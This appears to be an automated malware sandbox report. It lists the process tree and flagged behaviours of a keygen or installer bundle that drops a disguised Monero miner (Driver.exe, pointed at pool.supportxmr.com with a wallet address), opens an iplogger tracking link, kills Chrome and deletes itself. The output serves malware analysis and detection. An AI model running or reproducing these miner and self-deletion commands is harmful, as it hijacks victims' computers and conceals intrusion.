"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1540

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:340

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2804

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2400

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1732

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2144

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1496

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2240

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2040

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2540

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2024

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2244

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1636

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2876

C:\ProgramData\7687336.84
"C:\ProgramData\7687336.84"
2⤵
- Executes dropped EXE
PID:316

C:\Users\Admin\Desktop\Install.exe
"C:\Users\Admin\Desktop\Install.exe"
1⤵
- Executes dropped EXE
PID:1140

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2056

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2616

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
2⤵
- Executes dropped EXE
PID:3024

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:2932

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:2972

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:2372

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
3⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
3⤵
PID:2192

C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
3⤵
PID:1804

C:\Users\Admin\AppData\Local\Temp\is-LK5HE.tmp\23E04C4F32EF2158.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LK5HE.tmp\23E04C4F32EF2158.tmp" /SL5="$2C01F6,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
4⤵
PID:752

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/14Zhe7"
5⤵
PID:2032

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Zhe7
6⤵
PID:2280

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2280 CREDAT:275457 /prefetch:2
7⤵
PID:2316

C:\Program Files (x86)\DTS\seed.sfx.exe
"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
5⤵
PID:2696

C:\Program Files (x86)\Seed Trade\Seed\seed.exe
"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
6⤵
PID:3064

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
3⤵
PID:1328

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Executes dropped EXE
- Runs ping.exe
PID:2996

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
2⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:2116

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:2456

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
3⤵
PID:1592

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Executes dropped EXE
- Runs ping.exe
PID:2900

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Desktop\Setup.exe"
2⤵
PID:1592

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
3⤵
- Runs ping.exe
PID:2156

C:\Users\Admin\Desktop\keygen-step-1.exe
"C:\Users\Admin\Desktop\keygen-step-1.exe"
1⤵
PID:2352

C:\Users\Admin\Desktop\BTRSetp.exe
"C:\Users\Admin\Desktop\BTRSetp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\ProgramData\8572822.94
"C:\ProgramData\8572822.94"
2⤵
PID:2936

C:\ProgramData\2597364.28
"C:\ProgramData\2597364.28"
2⤵
PID:3036

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
3⤵
- Executes dropped EXE
PID:1840

C:\ProgramData\2995659.32
"C:\ProgramData\2995659.32"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1380

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
PID:2976

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
PID:2588

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
PID:2216

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
PID:2300

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:516

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2784

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2636

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2700

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1816

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2884

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2780

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2476

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2304

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1328

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2012

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1408

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1756

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2164

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1884

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:3004

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1836

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2712

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2460

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1328

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2896

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2784

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2632

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1008

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2888

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1516

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2924

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2512

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2184

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:916

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1584

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2548

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2520

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2580

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1404

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1640

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2244

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2792

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
